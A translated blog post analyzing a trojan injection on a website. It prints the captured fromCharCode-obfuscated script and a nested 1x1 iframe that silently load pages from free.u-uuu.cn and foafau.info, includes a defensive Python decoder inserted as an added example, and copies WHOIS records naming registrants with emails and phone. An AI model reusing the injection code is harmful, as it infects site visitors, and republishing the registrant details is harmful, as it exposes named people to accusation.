First published on my blog:
http://www.areway.cn/?p=175
Over the weekend, as soon as I came online, 鸭子 messaged me on QQ saying his site had been hit with a trojan injection (挂马). I didn't think much of it and opened the link directly; here is the page source I captured:
<script>t='60,105,102,114,97,109,101,
32,115,114,99,61,104,116,116,112,58,47,47,
102,114,101,101,46,117,45,117,117,117,46,99,
110,47,101,114,114,111,114,46,104,116,109,
32,119,105,100,116,104,61,49,48,48,32,104,
101,105,103,104,116,61,48,62,60,47,105,102,
114,97,109,101,62';
t=eval('String.fromCharCode('+t+')');document.write(t);</script>
<script>t='60,105,102,114,97,109,101,32,115,
114,99,61,104,116,116,112,58,47,47,102,114,
101,101,46,117,45,117,117,117,46,99,110,47,
101,114,114,111,114,46,104,116,109,32,119,
105,100,116,104,61,49,48,48,32,104,101,105,
103,104,116,61,48,62,60,47,105,102,114,97,
109,101,62';t=eval('String.fromCharCode('+t+')');
document.write(t);</script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Published By Newasp.cc 2007-12-7-18:03:23 -->
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>首页 - 爱生活家庭网
Above is a script whose payload is "encrypted" as a list of decimal character codes. Roughly, it stores all of the characters in the string t, converts them back with String.fromCharCode, and finally writes the result into the page with document.write(t).
Decoded, the string reads roughly as follows (click it at your own risk):
<script>t='<iframe src=http://free.u-uuu.cn/error.htm width=………
Looked up the details of the domain u-uuu.cn:
Domain Name: u-uuu.cn
ROID: 20070901s10001s64972306-cn
Domain Status: ok
Registrant Organization: 王雷
Registrant Name: 王雷
Administrative Email: czlovexs@126.com
Sponsoring Registrar: 北京万网志成科技有限公司
Name Server: ns.yovole.com
Name Server: ns1.yovole.com
Registration Date: 2007-09-01 17:54
Expiration Date: 2008-09-01 17:54
Finally I pinged the address; nothing came of it....

Continued the analysis inside a virtual machine: opened the link above in IE... viewed the source... and there was another nested one right away.
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
<script language="javascript" src="http://count43.51yes.com/click.aspx?id=4333375720&logo=6"></script>
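As an added example (not code from the original post), here is a small Python triage script a defender can run over a captured page: it statically decodes the String.fromCharCode decimal payload shown earlier without evaluating any script, then checks the decoded markup together with the raw nested iframe just above for the 0-pixel or 1x1 geometry that drive-by iframes use to stay invisible, and lists the hosts involved for blocklisting. The sample HTML is constructed for this example from the snippets on this page, plus one visible control iframe on a placeholder host (example.invalid).

```python
import re
from urllib.parse import urlsplit

# Constructed sample: the injected script captured from the compromised page
# (decimal array copied from the post), the nested 1x1 iframe, and one visible
# control iframe on a placeholder host so the hidden/visible check is exercised.
CAPTURED_HTML = """<script>t='60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,102,114,101,101,46,117,45,117,117,117,46,99,110,47,101,114,114,111,114,46,104,116,109,32,119,105,100,116,104,61,49,48,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62';t=eval('String.fromCharCode('+t+')');document.write(t);</script>
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
<iframe src="http://example.invalid/visible.htm" width=300 height=200></iframe>
"""

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
# A quoted string made only of comma-separated decimal numbers (the payload).
CHARCODE_STRING_RE = re.compile(r"['\"]\s*(\d{1,3}(?:\s*,\s*\d{1,3})+)\s*['\"]")
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
# name=value with double-quoted, single-quoted or unquoted values.
ATTR_RE = re.compile(r"(\w+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))")


def decode_charcodes(code_list):
    """Do what String.fromCharCode(...) would do, without running any script."""
    return "".join(chr(int(n)) for n in code_list.split(","))


def decode_scripts(html):
    """Return the decoded payload of every fromCharCode-obfuscated script block."""
    decoded = []
    for script in SCRIPT_RE.findall(html):
        if "fromCharCode" not in script:
            continue
        for m in CHARCODE_STRING_RE.finditer(script):
            decoded.append(decode_charcodes(re.sub(r"\s+", "", m.group(1))))
    return decoded


def parse_attrs(attr_text):
    """Parse the attribute list of a tag into a lower-cased dict."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        value = next(g for g in m.groups()[1:] if g is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def is_hidden(attrs):
    """Flag the 0-pixel / 1x1 geometry used to keep an injected iframe invisible."""
    def px(v):
        try:
            return int(str(v).strip().rstrip("px"))
        except ValueError:
            return None
    w, h = px(attrs.get("width", "")), px(attrs.get("height", ""))
    return (w is not None and w <= 1) or (h is not None and h <= 1)


def find_iframes(html):
    """List (src, hidden) for every iframe in the raw HTML and in decoded payloads."""
    findings = []
    for fragment in [html] + decode_scripts(html):
        for m in IFRAME_RE.finditer(fragment):
            attrs = parse_attrs(m.group(1))
            findings.append((attrs.get("src", ""), is_hidden(attrs)))
    return findings


def hidden_iframe_hosts(html):
    """Hostnames loaded by hidden iframes: candidates for a blocklist / IoC list."""
    return sorted({urlsplit(src).hostname
                   for src, hidden in find_iframes(html) if hidden and src})


if __name__ == "__main__":
    for payload in decode_scripts(CAPTURED_HTML):
        print("decoded script payload:", payload)
    for src, hidden in find_iframes(CAPTURED_HTML):
        print(("HIDDEN " if hidden else "visible") + " iframe ->", src)
    print("hosts to block:", hidden_iframe_hosts(CAPTURED_HTML))
```

The decoder never calls eval or a JavaScript engine: the payload is recovered purely by mapping the decimal codes back to characters, so the script can be pointed at untrusted captures safely. The geometry check is deliberately loose (width or height of at most one pixel, with or without a px suffix) because both the height=0 form in the decoded payload and the 1x1 form in the nested iframe appear on this page.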
This domain is quite possibly the trojan author's own:

Details of foafau.info:
Access to INFO WHOIS information is provided to assist persons in
determining the contents of a domain name registration record in the
Afilias registry database. The data in this record is provided by
Afilias Limited for informational purposes only, and Afilias does not
guarantee its accuracy. This service is intended only for query-based
access. You agree that you will use this data only for lawful purposes
and that, under no circumstances will you use this data to: (a) allow,
enable, or otherwise support the transmission by e-mail, telephone, or
facsimile of mass unsolicited, commercial advertising or solicitations
to entities other than the data recipient's own existing customers; or
(b) enable high volume, automated, electronic processes that send
queries or data to the systems of Registry Operator, a Registrar, or
Afilias except as reasonably necessary to register domain names or
modify existing registrations. All rights reserved. Afilias reserves
the right to modify these terms at any time. By submitting this query,
you agree to abide by this policy.
Domain ID:D22418703-LRMS
Domain Name:FOAFAU.INFO
Created On:20-Nov-2007 16:05:42 UTC
Last Updated On:20-Nov-2007 16:05:44 UTC
Expiration Date:20-Nov-2008 16:05:42 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:GODA-040110615
Registrant Name:liu hong
Registrant Organization:
Registrant Street1:beijing
Registrant Street2:
Registrant Street3:
Registrant City:beijing
Registrant State/Province:
Registrant Postal Code:100000
Registrant Country:CN
Registrant Phone:+86.860108888777
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:bbbshiji@163.com
Admin ID:GODA-240110615
Admin Name:liu hong
Admin Organization:
Admin Street1:beijing
Admin Street2:
Admin Street3:
Admin City:beijing
Admin State/Province:
Admin Postal Code:100000
Admin Country:CN
Admin Phone:+86.860108888777
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:bbbshiji@163.com
Billing ID:GODA-340110615
Billing Name:liu hong
Billing Organization:
Billing Street1:beijing
Billing Street2:
Billing Street3:
Billing City:beijing
Billing State/Province:
Billing Postal Code:100000
Billing Country:CN
Billing Phone:+86.860108888777
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:bbbshiji@163.com
Tech ID:GODA-140110615
Tech Name:liu hong
Tech Organization:
Tech Street1:beijing
Tech Street2:
Tech Street3:
Tech City:beijing
Tech State/Province:
Tech Postal Code:100000
Tech Country:CN
Tech Phone:+86.860108888777
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:bbbshiji@163.com
Name Server:NS27.DOMAINCONTROL.COM
Name Server:NS28.DOMAINCONTROL.COM
Next I downloaded the code from each of the files:
Looking through them one step at a time..
It's all decimal-encoded code of the same kind, and I couldn't be bothered to analyze it any further; anyone who enjoys this sort of thing can carry on from here.